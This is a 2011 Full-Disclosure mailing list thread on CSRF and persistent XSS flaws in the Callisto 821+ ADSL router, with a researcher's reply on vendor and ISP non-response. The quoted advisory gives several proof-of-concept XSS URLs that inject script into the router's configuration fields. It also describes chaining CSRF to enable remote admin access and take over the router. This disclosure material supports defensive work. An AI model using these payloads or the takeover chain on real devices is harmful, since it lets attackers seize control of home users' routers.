[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Multiple CSRF and XSS vulnerabilities in ADSL modem Callisto 821+
- To: "-= Glowing Sex =-" <doomxd@xxxxxxxxx>
- Subject: Re: [Full-disclosure] Multiple CSRF and XSS vulnerabilities in ADSL modem Callisto 821+
- From: "MustLive" <mustlive@xxxxxxxxxxxxxxxxxx>
- Date: Tue, 2 Aug 2011 23:58:52 +0300
Hello 0xd0!
> So, you could maybe have to think if the router has port 80 open and i assume
> a remote-service
Yes, port 80 (and also 8008, as I wrote in my first advisory about Callisto
821+) is open, but it's accessible only from local - from local computer and
LAN, and not from Internet (by default it's disabled). And all those hundreds
of CSRF, XSS and DoS holes which I disclosed, without taking into account
"unlimited" XSS and DoS holes, allow to bypass this limitation of disallowed
remote access and to attack control panel from remote. Including it's possible
to enable via CSRF a remote access from Internet to control panel and then by
using default login and password (or if worry that user changed it, then make
via CSRF a new user with specified login and password) log into control panel
and take router under control.
About such "unlimited" vulnerabilities I wrote in article How to find billion
of XSS vulnerabilities
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-November/007233.html).
> Luckily some isp's do protect your modem, as many are so it seems, coded
> weakly in the firmware area.
Developer of modem already protected (as they thought) their consumers by
disallowing access from Internet by default. My ISP Ukrtelecom (already my ex
ISP) didn't change this setting and also thought it was enough to protect
clients. After in beginning of April I first time entered into control panel
and found that it was full of CSRF holes (in addition to default login and
password), I talked with Ukrtelecom's representative by phone.
And asked him why their company didn't change default login and password and
not inform all their clients about control panel, the login and password for
specific model of router (different models have differences and no
documentation on routers was given to the clients), the fact that default login
and password was used and not recommended clients to change it. And they
answered that because by default access from Internet is disallowed, they
though that everything is secure and their company (holemaking one - with
multiple holes on multiple their web sites and in their Internet and
telecommunication services, which I've informed them for last years) don't
worry about their clients. And on my question about multiple CSRF which can
remotely change any settings of modem, he didn't answer, because he don't know
what it is. So attacks from local (from lamers or viruses at local computer or
LAN) and attacks from Internet on logged in to control panel modem owner are
possible and not considered as a threat at all by developer of the router and
this ISP (similar situation can be with other ISPs).
> That is consumer value,and i assume the company has released a patch ?
No, company (Iskra) completely ignored these issues (and there are hundreds of
holes in their router). They ignored as my first letter from 26th of May, as
all other letters (24 letters in total during May - July about different
vulnerabilities). Looks like they don't care about security of their products
and of their clients. Similarly as ISP Ukrtelecom, which is Iskra's routers
distributor in Ukraine (possibly only one ISP who distribute these routers) and
which is also completely ignored security of their own sites, services, routers
which they sell and of their clients.
So all consumers of Isrka modems should know the truth - the real situation
with security of the routers of this company. I made my decision (after all
these holes in Ukrtelecom and Iskra and their ignoring) - I no more using not
their services, nor their modems. Besides, Iskra is funny company - from their
official e-mails (mentioned at the site) service@ is not working at all, but
e-marketing@ works, but they're not answering, not fixing, just ignoring, as
I've already mentioned.
> why then disclose the thing, i guess you either go one way or the other, know
> what i mean ?
No I don't :-). But there are always reasons for disclosing vulnerabilities.
And there are reasons in this particular case and they are obvious and
mentioned in every my post about this router (besides worrying about security
of the people which is by default in all my disclosures).
> but yea, nice stuff if xss is your thing. ;')
All these hundreds of CSRF, XSS and DoS holes in this router are nice by its
own. And yes, there are all found by me. All these holes in Callisto 821+
(http://securityvulns.ru/news/ZTE/Callisto/821.html) (from 24 advisories 3APA3A
forget to put two in July, so they are no listed in this list - I've already
reminded him two times, so he'd fix it).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
----- Original Message -----
From: -= Glowing Sex =-
To: MustLive
Cc: full-disclosure@xxxxxxxxxxxxxxxxx
Sent: Saturday, July 30, 2011 1:42 AM
Subject: Re: [Full-disclosure] Multiple CSRF and XSS vulnerabilities in ADSL
modem Callisto 821+
So... advanced...
So, you could maybe have to think if the router has port 80 open and i assume
a remote-service,most isp's would have the port 80 remote-assist open for
possibly helping a customer,I know that is the first thing i switch to 'off'
,and actually, my isp went thru that with me on install.
Luckily some isp's do protect your modem, as many are so it seems, coded
weakly in the firmware area.
That is consumer value,and i assume the company has released a patch ?
Usually, you would either contact a vendor and completely see-it-through,asin
wait for theyre reply, I do not see this in the actual timeline, i only see
that you have said your working 'with' them, and theyre CEO... why then
disclose the thing, i guess you either go one way or the other, know what i
mean ?
You should have a 2011-*-* - Vendor has now patched the issue regarding this
, and possibly if it is serious, assigned a bid/cve.
I am only assuming what i see with other disclosure policies... but yea, nice
stuff if xss is your thing. ;')
cheers
0xd0
On 30 July 2011 07:30, MustLive <mustlive@xxxxxxxxxxxxxxxxxx> wrote:
Hello list!
After discussion with Michael Simpson about these vulnerabilities in
Callisto 821+, I want to warn you about new multiple security
vulnerabilities in ADSL modem Callisto 821+ (SI2000 Callisto821+ Router).
These are Cross-Site Request Forgery and Cross-Site Scripting
vulnerabilities. In April I've already drew attention of Ukrtelecom's
representative (and this modem was bough at Ukrtelecom) about multiple
vulnerabilities in this model of Callisto modems (and other models also
could be affected).
SecurityVulns ID: 11700.
-------------------------
Affected products:
-------------------------
Vulnerable is the next model: SI2000 Callisto821+ Router: X7821 Annex A
v1.0.0.0 / Argon 4x1 CSP v1.0 (ISOS 9.0) [4.3.4-5.1]. This model with other
firmware and also other models of Callisto also must be vulnerable.
----------
Details:
----------
These attacks should be conducted on modem owner, which is logged into
control panel. Taking into account that it's unlikely to catch him in this
state, then it's possible to use before-mentioned vulnerabilities
(http://websecurity.com.ua/5161/) for conducting of remote login (for
logining him into control panel). After that it's possible to conduct CSRF
or XSS attack.
CSRF (WASC-09):
Every connection in section LAN connections, as default, as other
connections, has advanced settings. Let's view on example of default
connection (iplan).
In section Edit connection in subsection Edit Ip Interface
(http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan)
via CSRF it's possible to change settings (IP, Mask and others) of
connection.
In subsection Edit Tcp Mss Clamp
(http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan.ImTcpMssClamp)
via CSRF it's possible to change settings of connection.
In subsection Edit Rip Versions
(http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan.ImRipVersions)
via CSRF it's possible to change settings of connection.
In subsection Edit NAT
(http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan.ImNatHelper)
via CSRF it's possible to change settings of connection.
XSS (WASC-08):
There are many persistent XSS vulnerabilities in above-mentioned four
subsections of section Edit connection.
In subsection Edit Ip Interface:
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Aipaddr=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Amask=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Adhcp=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Amtu=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3AsourceAddrValidation=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3AicmpRouterAdvertise=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Aenabled=%3Cscript%3Ealert(document.cookie)%3C/script%3E
In subsections Edit Tcp Mss Clamp, Edit Rip Versions and Edit NAT the
situation is similar.
And also attacks via the names of parameters are possible (when XSS code is
setting in the name of parameter), which I wrote about earlier
(http://websecurity.com.ua/5277/).
In this case the code will be executed immediately, and also at visiting of
pages http://192.168.1.1/system/events.html and
http://192.168.1.1/shared/event_log_selection.html.
------------
Timeline:
------------
2011.04.14 - informed Ukrtelecom about multiple vulnerabilities in modems,
which they give (sell) to their clients.
2011.07.23 - disclosed at my site.
2011.07.24 - informed developers (Iskratel).
I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/5296/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/